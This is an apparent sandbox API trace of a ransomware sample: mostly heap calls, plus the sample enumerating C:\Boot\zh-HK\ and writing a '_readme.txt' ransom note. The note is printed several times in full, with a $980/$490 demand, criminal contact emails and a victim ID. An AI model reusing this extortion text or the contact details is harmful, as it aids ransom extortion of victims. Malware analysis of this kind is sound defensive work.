[0228.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.735] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0228.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.735] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.735] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.735] PathFindFileNameW (pszPath="") returned="" [0228.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.735] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.736] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3b78058 [0228.736] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3466428 [0228.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.736] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.736] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0228.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.736] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 0 [0228.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x3b7b818 [0228.737] lstrcpyW (in: lpString1=0x3b7b818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.737] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3467538 [0228.737] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\_readme.txt" (normalized: "c:\\boot\\zh-hk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.738] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.738] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.738] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.738] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.738] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.738] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.739] RtlAllocateHeap 